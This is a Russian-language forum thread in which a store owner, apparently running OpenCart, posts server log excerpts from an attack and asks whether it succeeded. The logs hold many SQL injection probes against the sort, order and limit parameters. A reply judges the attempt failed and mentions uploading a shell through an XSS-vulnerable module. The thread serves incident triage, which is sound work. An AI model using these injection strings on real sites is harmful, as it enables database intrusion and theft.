Перейти к содержанию

Рекомендуемые сообщения

День добрый, недавно была атака, пытались делать запросы типа:

0UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20--%20/*%20order%20by%20%27as%20/*
_or_(1,2)=(select*from(select+name_const(CHAR(108,105,71,88,117,97,83,105,67,119,120),1),name_const(CHAR(108,105,71,88,117,97,83,105,67,119,120),1))a)+--+"x="= 

Скину все логи за этот день, хочется убедиться, что попытка была неудачной, либо заделать брешь на будущее.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Да, попытка
Но из обрывка лога не увидишь больше ничего

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
5 минут назад, markimax сказал:

Да, попытка
Но из обрывка лога не увидишь больше ничего

Лог состоит из 460 тыс строк. 

Т.к. не разбираюсь в программировании, боюсь выкладывать весь лог на форум, если бреши все таки есть - выставлять их для максимального круга лиц.

 

Если Вы можете просмотреть - могу выслать, по оплате согласуем. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

а где и как логируются подобные вещи?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Выходные что-ли у всех. Может кто посоветует человека специализирующегося на защите сайта, приобрел бы услугу анализа сайта на предмет уязвимостей.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Зачем? от чего защищаться?

поищите здесь @Yoda давал пример htaccess

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Файл error.log

	Line 192: [Tue Sep 18 15:17:35 2018] [warn] [client 176.97.36.105] (104)Connection reset by peer: mod_fcgid: error reading data from FastCGI server
	Line 193: [Tue Sep 18 15:17:35 2018] [error] [client 176.97.36.105] Premature end of script headers: index.php

и

	Line 139: [Tue Sep 18 15:12:36 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45) --  /* failed
	Line 140: [Tue Sep 18 15:12:36 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45) --  /* failed
	Line 141: [Tue Sep 18 15:12:36 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45) --  /* failed
	Line 142: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45) --  /* failed
	Line 143: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45) --  /* failed
	Line 144: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45) --  /* failed
	Line 145: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45) --  /* failed
	Line 146: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45) --  /* failed
	Line 147: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45) --  /* failed
	Line 148: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45) --  /* failed
	Line 149: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45) --  /* failed
	Line 150: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45) --  /* failed
	Line 151: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45) --  /* failed
	Line 152: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45) --  /* failed
	Line 153: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45) --  /* failed
	Line 154: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45),CHAR(45,120,50,53,45,81,45) --  /* failed

acces.log

46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?limit=24+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(115,122,111,77,106,116,74,78,77),1),name_const(CHAR(115,122,111,77,106,116,74,78,77),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1),name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?sort=p.sort_order&order=ASC1111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(115,122,111,77,106,116,74,78,77),1),name_const(CHAR(115,122,111,77,106,116,74,78,77),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?limit=24+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:05 +0300] "GET /?order=ASC&sort=p.sort_order HTTP/1.0" 200 27079 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1),name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(115,122,111,77,106,116,74,78,77),1),name_const(CHAR(115,122,111,77,106,116,74,78,77),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?limit=241111111111111"_UNION_SELECT_CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45)_--_/*_order_by_="as_/*= HTTP/1.0" 200 26801 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?limit=24+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC'&sort=p.sort_order\" HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1),name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?sort=p.sort_order&order=ASC1111111111111"_UNION_SELECT_CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)_--_/*_order_by_="as_/*= HTTP/1.0" 200 26178 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:05 +0300] "GET /?limit=241111111111111"_UNION_SELECT_CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45)_--_/*_order_by_="as_/*= HTTP/1.0" 200 25658 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
10 часов назад, Mops009 сказал:

Файл error.log

и

acces.log

 

limit, order, sort под "контролем" inject туда не сделать
opencart так просто не пробить
Так что можете спать спокойно
Но... взломать вас хотели или хотят, это факт
Если нету модулей позволяющих загружать пользователям изображения на сервер, то вряд ли что зальют
Хотя .. вот недавно, модуль Reviews PRO (с возможностью загрузки изображений)  с маркетплейс opencart.com
За пару минут сразу нашел XSS (шедевральные идиоты его делали (отписал пользователю, а он авторам, смотрю xss уже закрыли)) и залил шелл (пользователю показал)  (так и не закрыли, понятное дело если допустили XSS то  не хватает квалификации понять другие пробои, по серьезнее)
 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Похожий контент

    • От PoliteX
      Добрый день, сегодня в журнале ошибок сайте заметил следующее
       


       
      стоит ли беспокоиться?  был ли взлом?
      ocStore Версия 1.5.5.1.2
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.